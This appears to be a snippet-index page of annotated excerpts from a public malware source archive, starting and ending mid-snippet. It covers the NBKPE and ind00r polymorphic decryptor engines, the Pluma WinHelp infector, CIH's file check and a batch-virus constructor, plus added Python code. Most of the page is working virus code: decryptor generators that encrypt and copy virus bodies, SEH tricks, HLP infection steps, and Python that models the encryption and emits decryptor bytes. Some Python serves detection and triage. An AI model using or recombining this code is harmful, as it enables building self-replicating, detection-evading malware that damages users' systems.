        jmp     ciCreateOperand
```

--------------------------------

### Assembly: Data Manipulation with STOSB and STOSD

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.NBKPE.txt

Emits the instruction that installs the generated SEH frame, `mov fs:[0], esp`: 64h (FS prefix) first; if a register known to hold zero is recorded in xor_reg the store goes through it (89h plus a ModRM derived from CL), otherwise the 16-bit-addressing form 67h 89h 26h 0000h (the bytes spelled out in the comment) is used. chg_garble then inserts garbage.

```assembly
;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+
        mov     al,64H                  ; FS: prefix
        stosb
        mov     bl,byte ptr [ebp+xor_reg]
        or      bl,bl
        jz      @@9                     ; no regs
        mov     al,89H                  ; mov r/m32, r32
        stosb
        mov     al,cl                   ; Get used reg
        sub     al,10H                  ; ...
        jmp     @@10
@@9:
        mov     eax,00268967H           ; 6789260000: mov fs:[0000], esp (16-bit addressing)
        stosd
        xor     al,al
@@10:
        stosb
        call    chg_garble
;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+
```

--------------------------------

### Exception Handling for Non-Win9x Systems

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt

Exception handler for the case that the host is not Windows 9x: it reads the head of the SEH chain from fs:[0], restores ESP from the first dword of that record (where the infector keeps the stack pointer to return to) and jumps to quitSEH to abort quietly.

```assembly
exception:
        xor     esi,esi                 ; we are not under
        mov     eax,dword ptr fs:[esi]  ; win9x... a pitty
        mov     esp,dword ptr [eax]
        jmp     quitSEH
```

--------------------------------

### Code Encryption/Decryption Initialization

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.NBKPE.txt

Builds the NBKPE decryptor and lays the virus body behind it. The comment lists the five instructions the decryptor consists of; the helper calls (edi_ofs, len_ecx, edi2eax, xor_eax, eax2edi, add_edi, do_loop) emit them one at a time and record in _off1/_off2/_off3 where immediates have to be patched. After the loop is emitted, the runtime offset of the encrypted body (decryptor size + _RVA + 2) is patched into the `mov edi, imm32`, the virus body is copied behind the decryptor, and a copy of the decryptor is staged in the 30-byte `buff`, padded with NOPs and followed by six RET bytes.

```assembly
;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
; CRYPT CODE                    *
;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
CRYPT proc
        ; 1) mov edi, 'CODE_OFFSET_RUNTIME'
        ; 2) mov ecx, 'VIRUS_LENGTH'
        ; 3) mov /eax/ebx/edx/, DWORD PTR [edi]
        ; 4) xor /eax/ebx/edx/, KEY
        ; 5) add/sub /eax/ebx/edx/, BYTE
        mov     [ebp+_off1],edi         ; PROC init: start of the decryptor
        call    edi_ofs                 ; mov edi, imm32 (patched below)
        mov     ecx,dword ptr [ebp+len]
        call    len_ecx                 ; mov ecx, length
        call    edi2eax                 ; mov reg, [edi]
        push    edi
        call    xor_eax                 ; xor reg, key
        call    eax2edi                 ; mov [edi], reg
        call    add_edi                 ; advance edi
        pop     ebx
        sub     ebx,2                   ; Back to instruction
        call    do_loop                 ; loop back to the load
        mov     eax,edi
        sub     eax,[ebp+all_ini]       ; EAX = decryptor size
        add     eax,[ebp+_RVA]
        add     eax,2
        mov     esi,[ebp+_off2]
        mov     [esi],eax               ; patch the imm32 of the mov edi
        push    edi                     ; Save end of decryptor
        mov     ecx,dword ptr [ebp+len]
        mov     esi,dword ptr [ebp+ofsvir]
        rep     movsd                   ; copy it (the virus body)
        pop     edi
        push    edi
        sub     edi,[ebp+_off1]
        mov     eax,edi                 ; EAX = decryptor length
        mov     ebx,[ebp+_off3]
        mov     esi,ebx
        lea     edi,[ebp+ofs buff]
        mov     ecx,eax
        mov     edx,30
        sub     edx,ecx
        rep     movsb                   ; stage a copy in buff
        mov     al,90H
        mov     ecx,edx
        sub     ecx,2
        rep     stosb                   ; pad with NOPs
        pop     edi
buff    db      30 dup (90H)
        db      6 dup (0C3H)
```

--------------------------------

### Assembly: Data Initialization and Subtraction

Source:
https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.NBKPE.txt

Computes the two distances the SEH patch uses: EDX = ini_SEH - all_ini (how far the SEH setup lies from the start of the generated code) and EAX = off6 - off1; both are added to _RVA in the SEH tail listed earlier.

```assembly
;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+
;
;mov [ebp+ofs wahoo],edi                ;
;
        mov     eax,[ebp+ini_SEH]       ;
        sub     eax,[ebp+all_ini]       ;
        mov     edx,eax                 ; EDX = ini_SEH - all_ini
;
        mov     eax,[ebp+off6]          ;
        sub     eax,[ebp+off1]          ; EAX = off6 - off1
;
```

--------------------------------

### BBM Window Management Functions

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/LegacyWindows/Win2k/Constructor.Script.IBBM.a.html

Opens a new browser window for displaying the generated code and writes output either to that window or to the main document, depending on the `codewindow` flag.

```javascript
function WinOpen(something) {
  msg = open(something, "DisplayWindow",
             "toolbar=no,directories=no,menubar=no,scrollbars=yes,resizable=yes");
  codewindow = true;
  return msg;
}

function write(stuff) {
  if (codewindow) msg.document.writeln(stuff);
  else document.writeln(stuff);
}

function wr(stuff) {
  if (codewindow) msg.document.write(stuff);
  else document.write(stuff);
}
```

--------------------------------

### Generate Opcode and Store Byte

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Finalizes an ALU opcode: bit 0 of a random byte decides whether the operation in CL is replaced by a 32-bit XOR, the REG_MEM bit (the operand direction of the opcode) is kept at random, and the two are ORed together and stored.

```assembly
        test    al, 01h
        jz      gcr_not_sub
        mov     cl, MATH_XOR or OPSIZE_32
gcr_not_sub:
        and     al, REG_MEM             ; random direction
        or      eax, ecx                ; create opcode
        stosb                           ; store opcode
```

--------------------------------

### Main function for Win32 Disassembler

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Libs/Win32/Disassembler/VirTool.Win32.Disassembler.4553_LDE.txt

GAS-syntax `main` of the length disassembler: opens the test file, allocates a buffer, reads up to 424 bytes, points EAX 0x74 bytes into the buffer (where the first instruction of the sample lies) and calls l_disasm, printing the instruction length it returns.
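An added example (Python; not code from the LDE listing that follows or from any of the sources quoted on this page): a length decoder for the x86-32 subset these engines emit, which also recognizes the Win9x VMM dynamic-link sites the CIH listings use (`int 20h` followed by a dword holding VxD ID and service number, which the VMM rewrites into `call dword ptr [service_table_entry]`). It assumes 32-bit code with no prefixes other than REP and knows only the opcodes listed in its tables; the service names and the SAMPLE bytes are constructed for the test.

```python
"""Length decoder for an x86-32 subset: ALU/mov/lea r/m forms, the 80-83
immediate group, FPU escapes D8-DF, pushes/pops, mov reg,imm, enter/leave/ret,
jumps and loop, plus the Win9x VxDCall convention (int 20h + dword)."""
import struct

# VxD services that appear in the CIH listings on this page (device 0040h = IFSMgr).
VXD_SERVICES = {
    (0x0040, 0x0032): 'IFSMgr_Ring0_FileIO',
    (0x0040, 0x0067): 'IFSMgr_InstallFileSystemApiHook',
    (0x0040, 0x0068): 'IFSMgr_RemoveFileSystemApiHook',
}

# Opcodes followed by a ModRM byte.
MODRM_OPS = {o for o in range(0x00, 0x40) if o & 7 < 4}          # ALU r/m,reg and reg,r/m
MODRM_OPS |= {0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x8B, 0x8D,
              0x80, 0x81, 0x83, 0xC1, 0xC6, 0xC7, 0xD1, 0xFF}
MODRM_OPS |= set(range(0xD8, 0xE0))                             # FPU escapes
IMM_AFTER_MODRM = {0x80: 1, 0x83: 1, 0x81: 4, 0xC1: 1, 0xC6: 1, 0xC7: 4}
# Fixed-length opcodes without ModRM.
FIXED = {0x90: 1, 0xC3: 1, 0xC9: 1, 0xCC: 1, 0xC2: 3, 0xC8: 4, 0x68: 5, 0x6A: 2,
         0xE8: 5, 0xE9: 5, 0xEB: 2, 0xE2: 2, 0xA8: 2, 0xA9: 5,
         0xA4: 1, 0xA5: 1, 0xAA: 1, 0xAB: 1, 0xCD: 2}
FIXED.update({o: 1 for o in range(0x50, 0x60)})                 # push/pop reg
FIXED.update({o: 2 for o in range(0xB0, 0xB8)})                 # mov reg8, imm8
FIXED.update({o: 5 for o in range(0xB8, 0xC0)})                 # mov reg32, imm32
FIXED.update({o: 2 for o in range(0x70, 0x80)})                 # jcc rel8
FIXED.update({o: 1 for o in range(0xF8, 0xFE)})                 # clc/stc/cli/sti/cld/std
FIXED.update({o: 2 for o in range(0x04, 0x40, 8)})              # ALU al, imm8
FIXED.update({o: 5 for o in range(0x05, 0x40, 8)})              # ALU eax, imm32


def modrm_len(code, i):
    """Bytes used by the ModRM at code[i] plus its SIB and displacement."""
    modrm = code[i]
    mod, rm = modrm >> 6, modrm & 7
    if mod == 3:
        return 1                                 # register operand
    n = 1
    if rm == 4:                                  # SIB follows
        n += 1
        if mod == 0 and code[i + 1] & 7 == 5:
            n += 4                               # [index*scale + disp32], no base
    elif mod == 0 and rm == 5:
        n += 4                                   # MOD_DIRECT: [disp32]
    return n + (1 if mod == 1 else 4 if mod == 2 else 0)


def insn_len(code, i=0):
    """Return (length, description) of the instruction at code[i]."""
    op = code[i]
    if op == 0xCD and code[i + 1] == 0x20:
        # VxDCall site: int 20h + dword (low word = service, high word = device).
        # The VMM patches these six bytes into `call dword ptr [entry]` (FF 15 disp32),
        # the same length, which is why CIH reads the dword at +2 in both states.
        service, device = struct.unpack_from('<HH', code, i + 2)
        name = VXD_SERVICES.get((device, service), 'unknown service')
        return 6, f'VxDCall {device:04X}:{service:04X} ({name})'
    if op == 0x0F:
        if 0x80 <= code[i + 1] <= 0x8F:
            return 6, 'jcc rel32'
        raise ValueError(f'unsupported two-byte opcode 0F {code[i + 1]:02X}')
    if op in (0xF2, 0xF3):                       # rep prefix on a string op
        n, desc = insn_len(code, i + 1)
        return n + 1, 'rep ' + desc
    if op in MODRM_OPS:
        n = 1 + modrm_len(code, i + 1) + IMM_AFTER_MODRM.get(op, 0)
        if op == 0xFF and (code[i + 1] >> 3) & 7 == 2:
            return n, 'call r/m32'               # what a patched VxDCall site becomes
        return n, 'fpu' if 0xD8 <= op <= 0xDF else 'modrm op'
    if op in FIXED:
        return FIXED[op], f'opcode {op:02X}'
    raise ValueError(f'unsupported opcode {op:02X} at offset {i}')


def decode(code):
    """Walk a byte string: [(offset, length, description), ...]."""
    out, i = [], 0
    while i < len(code):
        n, desc = insn_len(code, i)
        out.append((i, n, desc))
        i += n
    return out


# Constructed sample (not from the page): the shapes iGenProcs, the FPU methods
# and the CIH VxDCall sites emit, laid end to end.
SAMPLE = bytes.fromhex(
    '55 8BEC'                  # push ebp / mov ebp, esp
    'C8000000'                 # enter 0, 0
    '8B4508'                   # mov eax, [ebp+8]            (first parameter)
    '33048D78563412'           # xor eax, [ecx*4+12345678h]  (scaled index, no base)
    'D9ED D9FA'                # fldln2 / fsqrt
    'DC0D00104000'             # fmul qword ptr [00401000h]
    'B878563412 3578563412'    # mov eax, imm32 / xor eax, imm32
    'C9 C20800'                # leave / ret 8
    'CD2067004000'             # int 20h ; dd 00400067h      (unpatched VxDCall)
    'FF1500204000'             # call dword ptr [00402000h]  (the same site after patching)
)

if __name__ == '__main__':
    for off, n, desc in decode(SAMPLE):
        print(f'{off:04X}  {SAMPLE[off:off + n].hex():16}  {desc}')
```

Run it on a dump of generated decryptor code to check that the emitted procedure prologues, epilogues and operands have the lengths the generator intended; an unexpected ValueError is usually a sign of a malformed ModRM/SIB rather than a genuinely unknown opcode.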
```assembly
main:
        push    %ebp
        mov     %esp,%ebp
        push    $2                      # O_RDWR
        push    $file
        call    open
        mov     %eax,fd
        push    $424
        call    malloc
        mov     %eax,data
        push    $424
        push    data
        push    fd
        call    read
        mov     data,%eax
        add     $0x74,%eax              # entry point, first instruction - xor %eax,%eax
        push    %eax
        call    l_disasm
        push    %eax
        push    $l
        call    printf
        call    exit
l:      .string "Length of instruction: %d\n"
file:   .string "test"
        .comm   fd,4,4
        .comm   data,424,4
```

--------------------------------

### Method Table Initialization

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Offset table (relative to idelta) for the five memory-operand methods of iGetMemory. The three count constants mark how many leading entries are usable in each situation: GM_METHCNT3 = 2 (iGetWrMem), GM_METHCNT2 = 3 (before DECRYPT_DATA), GM_METHCNT1 = 5 (all methods).

```assembly
gm_methods equ $
        dd      offset gm_meth1 - idelta
        dd      offset gm_meth2 - idelta
GM_METHCNT3 equ 02h
        dd      offset gm_meth3 - idelta
GM_METHCNT2 equ 03h
        dd      offset gm_meth4 - idelta
        dd      offset gm_meth5 - idelta
GM_METHCNT1 equ 05h
```

--------------------------------

### HLP File - Search for System Directory

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt

Scans for the |SYSTEM internal file: skips the BTREEHEADER of the directory and compares each of the next 200h byte positions with the four characters |SYS (TASM stores the multi-character constant 'SYS|' with its first character in the most significant byte, so in memory it reads '|SYS'), ignoring the b-tree node structure. Files whose directory puts the name further away than 512 bytes are rejected as notNiceHlp.

```assembly
        ; scan for |SYSTEM directory.
        ; search 512 bytes into the b-tree and ignore the internal
        ; structures of b-tree.
        add     edi,size BTREEHEADER
        mov     ecx,200h
searchSystemDir:
        cmp     dword ptr [edi],'SYS|'  ; bytes '|SYS' in memory order
        je      foundSystemDir
        inc     edi
        loop    searchSystemDir
        jmp     notNiceHlp
```

--------------------------------

### Virus Data and Generator Addresses

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Engine signature string and two dispatch tables (offsets relative to idelta): Generatorz lists the eight decryptor-procedure generators in the order of the decryption loop (load pointer, counter and key; decrypt; step key, pointer and counter; an FPU decoy), JunkGen the two junk generators.
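The decryptor loop that NBKPE's CRYPT recipe spells out (mov edi,CODE / mov ecx,LEN / mov reg,[edi] / xor reg,KEY / add|sub reg,BYTE / store / loop) and the procedure list in the Generatorz table that follows (load pointer, counter and key; decrypt; step key, pointer and counter) have the same shape. This added Python example, not either engine's code, models that loop: `encrypt`/`decrypt` are the transform and its inverse, `emit_decryptor` produces one concrete byte form of the NBKPE stub, and `wildcard_pattern` derives a detection pattern from several variants. The opcode choices, the optional rolling-key step and the payload bytes are assumptions made here.

```python
"""Model of an NBKPE/ind00r-style decryptor loop and a signature derived from it."""
import struct

MASK = 0xFFFFFFFF
REGS = {'eax': 0, 'edx': 2, 'ebx': 3}          # the three registers NBKPE picks from


def decrypt(blob, key, delta, key_step=0):
    """What the emitted loop computes: d = (d ^ key) + delta per dword,
    with key += key_step between dwords (ind00r's 'increment key' step)."""
    out, k = bytearray(), key
    for (d,) in struct.iter_unpack('<I', blob):
        out += struct.pack('<I', ((d ^ k) + delta) & MASK)
        k = (k + key_step) & MASK
    return bytes(out)


def encrypt(code, key, delta, key_step=0):
    """Inverse transform applied at infection time: d = (d - delta) ^ key."""
    out, k = bytearray(), key
    for (d,) in struct.iter_unpack('<I', code):
        out += struct.pack('<I', ((d - delta) & MASK) ^ k)
        k = (k + key_step) & MASK
    return bytes(out)


def emit_decryptor(reg, code_va, n_dwords, key, delta):
    """Bytes of a fixed-key NBKPE-style decryptor: CRYPT's steps 1-5 plus the
    store and loop the recipe leaves implicit.  delta is a signed imm8."""
    r = REGS[reg]
    body = (bytes([0x8B, (r << 3) | 7])                                   # mov reg, [edi]
            + bytes([0x81, 0xF0 | r]) + struct.pack('<I', key)            # xor reg, imm32
            + bytes([0x83, (0xC0 if delta >= 0 else 0xE8) | r, abs(delta) & 0xFF])  # add/sub reg, imm8
            + bytes([0x89, (r << 3) | 7])                                 # mov [edi], reg
            + bytes([0x83, 0xC7, 0x04]))                                  # add edi, 4
    loop = bytes([0xE2, (-(len(body) + 2)) & 0xFF])                       # loop back to the load
    return (bytes([0xBF]) + struct.pack('<I', code_va)                    # mov edi, CODE_OFFSET
            + bytes([0xB9]) + struct.pack('<I', n_dwords)                 # mov ecx, length in dwords
            + body + loop)


def wildcard_pattern(variants):
    """Signature from several emitted decryptors: positions that differ between
    variants (register choice, immediates) become '??'; the skeleton stays."""
    width = min(len(v) for v in variants)
    return ' '.join('??' if len({v[i] for v in variants}) > 1 else f'{variants[0][i]:02X}'
                    for i in range(width))


if __name__ == '__main__':
    payload = bytes.fromhex('31C0 90 90 C3 90 90 90 90 90 90 90')   # constructed 12-byte payload
    blob = encrypt(payload, 0xDEADBEEF, 7, key_step=0x1234)
    assert decrypt(blob, 0xDEADBEEF, 7, key_step=0x1234) == payload
    print(emit_decryptor('eax', 0x00401000, 3, 0xDEADBEEF, 7).hex())
    print(wildcard_pattern([emit_decryptor('eax', 0x00401000, 3, 0xDEADBEEF, 7),
                            emit_decryptor('ebx', 0x00402000, 4, 0x01234567, -9),
                            emit_decryptor('edx', 0x00403000, 5, 0xFEEDFACE, 33)]))
```

The pattern that falls out is the classic weakness of a fixed-skeleton decryptor: only the register and immediate bytes move, so `BF ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B ?? 81 ...` with the `83 C7 04 E2` tail is enough to match every variant; ind00r's split into randomly ordered junk procedures is the answer to exactly this kind of signature.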
```assembly
; initialized data
        db      '[ind00r] polymorphic engine by slurp', 0

; decryptor instructions generator addresses (relative to idelta)
Generatorz
        dd      offset iProcLdPtr - idelta      ; load pointer
        dd      offset iProcLdCnt - idelta      ; load counter
        dd      offset iProcLdKey - idelta      ; load key
        dd      offset iProcDecData - idelta    ; decrypt data
        dd      offset iProcIncKey - idelta     ; increment key
        dd      offset iProcIncPtr - idelta     ; increment pointer
        dd      offset iProcDecCnt - idelta     ; decrement counter
        dd      offset iProcFPUFool - idelta    ; neat stuff :O

; junk instruction generator addresses (relative to idelta)
JunkGen
        dd      offset iMemJunk - idelta
        dd      offset iRegJunk - idelta
JUNKGEN_CNT equ 02h
```

--------------------------------

### Method 3: MOV REG, IMM32 then Arithmetic Operation

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Method 3 of the load-register generator: first emits `MOV reg, rnd` with a random dword, then (in the continuation, which this excerpt does not include) an ADD, SUB or XOR with the immediate that turns the random value into the wanted one.

```assembly
; method 3: mov reg, rnd;
;           sub/add/xor reg, imm add/sub/xor rnd
glr_meth3:
        mov     al, MOV_REG_IMM32       ; mov reg, imm32 opcode
        xor     eax, ebx                ; add register
        stosb                           ; store it
        call    rnd32                   ; get a random dword
        stosd                           ; store it
```

--------------------------------

### HLP File - Allocate Buffer for Macro

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt

Allocates the working buffer: the size is the |SYSTEM file's size (first dword of its file header, at EDX) plus a generous estimate for the macro, ((vSize/2)*10)+1000h bytes. VirtualAlloc(NULL, size, MEM_COMMIT = 1000h, PAGE_READWRITE = 4) is called with all registers preserved by pushad/popad, and the returned address is stored in mHnd; a failed allocation abandons the file.
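The Pluma fragments on this page (the 512-byte scan for |SYSTEM, the offset swap, the version check and the |SYSTEM copy, and the allocation listing that follows) assume the reader knows the WinHelp layout. This added Python example, not Pluma's code, is the triage-side counterpart: it parses the 16-byte HLP header, walks the internal directory b-tree to find |SYSTEM (falling back to Pluma's flat scan for deeper trees), parses the |SYSTEM file in both its layouts (title string when the minor version is 16 or lower, SYSTEMREC records otherwise) and lists the macros the file will run on load. Structure sizes follow the public HLP format notes (helpdeco); treating RecordType 4 as the CONFIG macro record is an assumption, and `build_sample` fabricates a minimal image so the code runs offline.

```python
"""WinHelp (.HLP) triage parser: header, directory b-tree, |SYSTEM, load macros."""
import struct

HLP_MAGIC, BTREE_MAGIC, SYSTEM_MAGIC = 0x00035F3F, 0x293B, 0x036C
FILEHEADER = struct.Struct('<IIB')             # ReservedSpace, UsedSpace, FileFlags
BTREEHEADER = struct.Struct('<HHH16shhhhhhi')  # Magic, Flags, PageSize, Structure, 0, Splits, RootPage, -1, TotalPages, NLevels, TotalEntries
SYSTEMHEADER = struct.Struct('<HHHIH')         # Magic, Minor, Major, GenDate, Flags
REC_TYPES = {1: 'TITLE', 2: 'COPYRIGHT', 3: 'CONTENTS', 4: 'CONFIG'}   # 4 = CONFIG is assumed


def zstring(buf, off):
    end = buf.index(b'\0', off)
    return buf[off:end], end + 1


def find_system_file(hlp):
    """Offset of the |SYSTEM FILEHEADER.  Walks a single-level directory b-tree;
    for deeper trees falls back to Pluma's flat scan of the 512 bytes after the
    BTREEHEADER for the '|SYSTEM' zstring and the dword behind it."""
    magic, dir_start, _free, size = struct.unpack_from('<IIiI', hlp, 0)
    if magic != HLP_MAGIC or size != len(hlp):
        raise ValueError('not a WinHelp file')
    tree = dir_start + FILEHEADER.size
    hdr = BTREEHEADER.unpack_from(hlp, tree)
    if hdr[0] != BTREE_MAGIC:
        raise ValueError('directory is not a b-tree')
    page_size, root, levels = hdr[2], hdr[6], hdr[9]
    pages = tree + BTREEHEADER.size
    if levels == 1:
        page = pages + root * page_size
        _unused, n_entries, _prev, _next = struct.unpack_from('<Hhhh', hlp, page)
        off = page + 8
        for _ in range(n_entries):                 # leaf entries: zstring name, dword offset
            name, off = zstring(hlp, off)
            file_off = struct.unpack_from('<I', hlp, off)[0]
            off += 4
            if name == b'|SYSTEM':
                return file_off
        raise ValueError('|SYSTEM not in directory')
    pos = hlp.find(b'|SYSTEM\0', pages, pages + 0x200)
    if pos < 0:
        raise ValueError('|SYSTEM not found')
    return struct.unpack_from('<I', hlp, pos + 8)[0]


def parse_system(hlp, off):
    """Parse the |SYSTEM internal file: (minor_version, title, [(type, data)])."""
    _reserved, used, _flags = FILEHEADER.unpack_from(hlp, off)
    body = off + FILEHEADER.size
    magic, minor, _major, _gendate, _flags = SYSTEMHEADER.unpack_from(hlp, body)
    if magic != SYSTEM_MAGIC:
        raise ValueError('bad |SYSTEM header')
    pos, end, records = body + SYSTEMHEADER.size, body + used, []
    if minor <= 16:                              # old format: title string only
        title, _ = zstring(hlp, pos)
        return minor, title.decode('latin-1'), records
    title = ''
    while pos + 4 <= end:                        # SYSTEMREC: type, size, data
        rtype, size = struct.unpack_from('<HH', hlp, pos)
        data = hlp[pos + 4:pos + 4 + size]
        pos += 4 + size
        records.append((REC_TYPES.get(rtype, str(rtype)), data))
        if rtype == 1:
            title = data.rstrip(b'\0').decode('latin-1')
    return minor, title, records


def config_macros(hlp):
    """Macros the file runs on load: the record type an HLP infector appends."""
    _, _, recs = parse_system(hlp, find_system_file(hlp))
    return [d.rstrip(b'\0').decode('latin-1') for t, d in recs if t == 'CONFIG']


def build_sample(macros=(), minor=21, page_size=0x80):
    """Constructed minimal HLP image: header, one-page directory, |SYSTEM."""
    if minor <= 16:
        recs = b'Demo\0'
    else:
        recs = struct.pack('<HH', 1, 5) + b'Demo\0'
        for m in macros:
            recs += struct.pack('<HH', 4, len(m) + 1) + m.encode('latin-1') + b'\0'
    sys_body = SYSTEMHEADER.pack(SYSTEM_MAGIC, minor, 1, 0, 0) + recs
    system_file = FILEHEADER.pack(len(sys_body), len(sys_body), 0) + sys_body
    dir_start = 16
    sys_off = dir_start + FILEHEADER.size + BTREEHEADER.size + page_size
    page = struct.pack('<Hhhh', 0, 1, -1, -1) + b'|SYSTEM\0' + struct.pack('<I', sys_off)
    page = page.ljust(page_size, b'\0')
    tree = BTREEHEADER.pack(BTREE_MAGIC, 2, page_size, b'Fz4', 0, 0, 0, -1, 1, 1, 1)
    directory = FILEHEADER.pack(len(tree) + page_size, len(tree) + page_size, 4) + tree + page
    header = struct.pack('<IIiI', HLP_MAGIC, dir_start, -1, 16 + len(directory) + len(system_file))
    return header + directory + system_file


if __name__ == '__main__':
    print(config_macros(build_sample(['BrowseButtons()'])))
```

On a real file, a non-empty `config_macros` list is not by itself suspicious (legitimate help files register macros too); what Pluma's approach produces is a |SYSTEM copy appended at the end of the file with a CONFIG record that was not there before, so comparing the directory offset of |SYSTEM with the file size is the cheap first check.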
```assembly
        ; get size of the directory
        mov     esi,dword ptr [edx]
        ; the max size of the macro, just an aproximation
        add     esi,((vSize/2)*10)+1000h
        ; alloc a temporary buffer
        pushad
        push    00000004h               ; PAGE_READWRITE
        push    00001000h               ; MEM_COMMIT
        push    esi                     ; size
        push    0                       ; any address
        call    dword ptr [_VirtualAlloc+ebp]
        or      eax,eax
        jne     bufferOk
        popad
        jmp     notNiceHlp
bufferOk:
        mov     dword ptr [mHnd+ebp],eax
        popad
```

--------------------------------

### HLP File - System Directory Version Check

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt

Validates the |SYSTEM header: the magic 036Ch must be present. If the minor version at +2 is 16 or lower, the 0Ch-byte header is followed by the help title as a zstring that has to be skipped (ESI starts at +0Ch and advances past the terminating zero); newer files carry SYSTEMREC records there instead.

```assembly
        ; check is a system directory
        cmp     word ptr [edi],036ch
        jne     notNiceHlp
        ; check version
        mov     esi,edi
        add     esi,0ch
        cmp     word ptr [edi+2],10h
        ja      noTitleHere
        ; if has title, skip it (version <= 16)
skipTitle:
        inc     esi
        cmp     byte ptr [esi-1],0
        je      skipTitle
noTitleHere:
```

--------------------------------

### ind00r Main Procedure

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

The main procedure of the ind00r polymorphic engine. It initializes the engine, emits a jump to the main loop, generates the (junk and decryptor) procedures, the main loop and an SEH-based jump into the decrypted code, computes the decryptor size into the caller's ECX, and finally encrypts the target code.

```assembly
; main procedure: ind00r
; parameters:
;
;       EAX = size of junk space (in dwords)
;       EDX = address of junk space
;               this is the RVA of an empty space in (un-
;               initialized data or padding space). the junk
;               instructions will write to this area
;
;       EBX = address of code to decrypt
;               this is the RVA where the encrypted
;               code will be stored in the infected file.
;
;       ECX = size of code to encrypt (in dwords)
;       ESI -> code to encrypt
;       EDI -> area >= 2kb to store the decryptor
;
; returns: the registers aren't changed except ECX that contains
;          the size of the poly decryptor!
;
; NOTE: '->' is equal to 'points to'
;
; the decryptor consists of junk procedures, decryptor procedures, main
; loop calling the procedures and finally jump to the start address to the
; decrypted code.

ind00r proc
        pushad                          ; preserve all registers
        call    iInit                   ; initialize poly engine
ind00r_delta:
        mov     al, JMP_LONG            ; write jump to main loop
        stosb                           ; store opcode
        push    edi                     ; to reloc jmp l8er
        stosd                           ; store relative offset
        call    WriteJunk               ; write some junk bytez
        call    iGenProcs               ; generate procedures
        push    edi                     ; here we want to jump
        call    RelLongJmp              ; reloc jump to main loop
        or      byte ptr [ebp.nojunk-idelta], 0FFh
        call    iGenLoop                ; generate main loop
        call    iSEHJump
        sub     edi, [esp.PUSHAD_EDI]   ; calculate decryptor size
        mov     [esp.PUSHAD_ECX], edi   ; ECX = size
        call    iEncrypt                ; encrypt code!
        popad                           ; restore all registers
        ret                             ; return
ind00r endp
```

--------------------------------

### Memory Junk Generator - Immediate Operation (Assembly)

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Memory junk method 1: an immediate operation on memory. rnd32r picks an operation type, anything at or above OPTYPE_MOV+1 is folded into OPTYPE_MOV, a random immediate is drawn and in three cases out of four sign-extended from a byte (giving the short imm8 encoding), then ciOpRMImm emits the instruction. The labels in the source were missing the `mj_` prefix their jumps use; they are restored here.

```assembly
mj_meth1:
        push    eax
        push    OPTYPE_MOV + 3
        call    rnd32r
        cmp     al, OPTYPE_MOV + 1
        jb      mj_m1_nmov
        mov     al, OPTYPE_MOV
mj_m1_nmov:
        xchg    eax, ebx                ; operation type
        call    rnd32
        xchg    eax, edx                ; immediate
        call    rnd32
        test    al, 0Ch
        jz      mj_m1_nsx
        movsx   edx, dl                 ; imm8, sign-extended
mj_m1_nsx:
        pop     eax
mj_m1_nrc:
        jmp     ciOpRMImm
```

--------------------------------

### Check for '.EXE' File Extension

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt

Compares the last four bytes of the file name (ESI = path, EAX = its length) with '.EXE'. TASM stores a multi-character constant with its first character in the most significant byte, so the dword 'EXE.' reads .EXE in memory order; writing it reversed is therefore the way to compare against the file-name bytes, which the commented-out line shows was the intent.

```assembly
        ; *************************************
        ; *        Is FileName '.EXE' !?      *
        ; *************************************
        ; cmp [esi+eax-04h], '.EXE'
        cmp     [esi+eax-04h], 'EXE.'   ; bytes '.EXE' in memory order
        pop     esi
        jne     DisableOnBusy
```

--------------------------------

### Info Function for Batch Bug Maker

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/LegacyWindows/Win2k/Constructor.Script.IBBM.a.html

Displays the help text of The Incredible Batch Bug Maker, explaining its parameters and options, by writing it into the display window one fragment at a time. The HTML markup that was inside the strings has not survived extraction.

```javascript
function Info() {
  WinOpen("");
  wr("The Incredible Batch Bug Maker");
  wr("Makes DOS 6 compatible replicating batch files");
  wr("Produced March 27, 1996");
  wr("The Key String must be unique, the generated bug will not ");
  wr("touch any batch containing this string. The Sub String is ");
  wr("used in compound methods, it should also be unique. Infects ");
  wr("per run is how many batches will be assimilated with each run ");
  wr("of a bugged batch, if omitted all available batches are game. ");
  wr("Max seeks is the maximum number of infected files skipped ");
  wr("before giving up, if empty or NaN no limit checks are made. ");
  wr("The Add Code box is for adding batch code that will run when ");
  wr("all time and date conditions are satisfied, or every time if ");
  wr("no conditions are entered. The condition strings simply match ");
  wr("the output from the date and time commands. Three methods of ");
  wr("attachment are available: Appending simply tacks on the code, ");
  wr("Inserting places the bug before the host, and Compound which ");
  wr("uses a single inserted line then appends the rest. Compound ");
  wr("Immediate runs the bug first, Compound Delayed runs the bug when ");
